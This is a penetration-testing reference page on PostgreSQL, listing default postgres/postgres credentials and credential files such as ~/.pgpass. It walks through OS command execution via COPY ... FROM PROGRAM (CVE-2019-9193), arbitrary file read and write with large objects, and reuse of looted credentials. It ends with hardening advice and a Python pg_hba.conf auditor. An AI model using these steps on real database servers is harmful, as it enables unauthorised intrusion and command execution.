PostgreSQL
aka postgres
Postgres on 5432. From a superuser session, COPY ... FROM PROGRAM is direct command execution, and large objects give arbitrary file read/write.
Ports
| Port | Proto | Notes |
|---|---|---|
| 5432 | tcp | PostgreSQL |
Fingerprint
- Banner / version via psql or nmap
- Default database postgres, default user postgres
Key files
| Path | Holds | Sensitive |
|---|---|---|
| ~/.pgpass | cached client credentials | sensitive |
| pg_hba.conf | auth rules (trust lines are a gift) | sensitive |
| postgresql.conf | server config and data dir | |
Default / weak creds
postgres / postgres; weak app creds
Service users
postgres
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2019-9193 | COPY FROM PROGRAM command execution (9.3-11) |
Exploitation primitives
- COPY cmd_exec FROM PROGRAM 'id' runs OS commands as the OS account the server runs under (normally postgres); it requires superuser or membership of the pg_execute_server_program role
- Large objects (lo_import / lo_export) read and write arbitrary files that the server's OS account can reach
- Reuse looted DB creds for OS login; trust lines in pg_hba.conf allow passwordless auth for every connection the line matches (commonly local socket lines, but a trust line on a host entry is reachable over the network)
Overview
PostgreSQL on 5432 becomes code execution the moment you have a superuser (or sufficiently privileged) login, via the COPY … FROM PROGRAM feature.
Exec
Connect:
psql -h <TARGET> -U postgres
Create a scratch table:
DROP TABLE IF EXISTS x; CREATE TABLE x(o text);
Run a command via COPY:
COPY x FROM PROGRAM 'id';
Read the output:
SELECT * FROM x;
Hardening
Run Postgres as a low-priv OS user, restrict superuser (and the pg_execute_server_program, pg_read_server_files and pg_write_server_files roles) to the accounts that genuinely need it, remove trust lines from pg_hba.conf, and keep the server patched. Note that upstream treats CVE-2019-9193 as intended superuser functionality rather than a bug, so there is no patch that removes COPY FROM PROGRAM; the control is not handing out superuser or pg_execute_server_program in the first place.
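To check the "remove trust auth" item above, here is an added example (not from the page) that parses a pg_hba.conf and flags trust lines, cleartext password lines, and rules reachable from any address. The configuration text is constructed for illustration, not taken from a real host.

```python
"""Audit pg_hba.conf for rules that hand out access (added example, not from the page)."""
import ipaddress
import re
from collections import namedtuple
HbaRule = namedtuple("HbaRule", "lineno conn_type database user address method")
DOTTED_QUAD = re.compile(r"\d+\.\d+\.\d+\.\d+")

def parse_pg_hba(text):
    """Parse rules of the form TYPE DATABASE USER [ADDRESS] METHOD; comments and blanks skipped."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        f = raw.split("#", 1)[0].split()
        if not f:
            continue
        if f[0] == "local" and len(f) >= 4:      # Unix-socket rules have no ADDRESS column
            rules.append(HbaRule(lineno, f[0], f[1], f[2], None, f[3]))
        elif len(f) >= 5:
            addr, i = f[3], 4
            if "/" not in addr and len(f) > 5 and DOTTED_QUAD.fullmatch(f[4]):
                addr, i = f"{addr}/{f[4]}", 5     # "10.0.0.0 255.0.0.0" form: fold netmask in
            rules.append(HbaRule(lineno, f[0], f[1], f[2], addr, f[i]))
    return rules

def is_wide_open(address):
    """True when the rule matches every client (all, 0.0.0.0/0, ::/0)."""
    try:
        return address == "all" or ipaddress.ip_network(address, strict=False).prefixlen == 0
    except (ValueError, TypeError):  # None (local rule), hostnames, samehost, samenet
        return False

def audit_pg_hba(text):
    """Return (line, severity, why) for each risky rule, in file order."""
    out = []
    for r in parse_pg_hba(text):
        exposed = is_wide_open(r.address)
        if r.method == "trust":
            out.append((r.lineno, "critical" if exposed else "high", "trust: no credential checked"))
        elif r.method == "password":
            out.append((r.lineno, "medium", "password: cleartext password on the wire"))
        elif exposed and r.method != "reject":
            out.append((r.lineno, "medium", f"{r.method}: rule reachable from any address"))
    return out

SAMPLE = """\
# constructed sample pg_hba.conf
local   all  all                       trust
host    all  all   0.0.0.0/0           trust
host    app  app   10.0.0.0 255.0.0.0  password
hostssl all  all   ::/0                scram-sha-256
"""
```

Point `audit_pg_hba` at the real file's contents (`open("/etc/postgresql/.../pg_hba.conf").read()`, path depends on the distribution) to get the findings for a host.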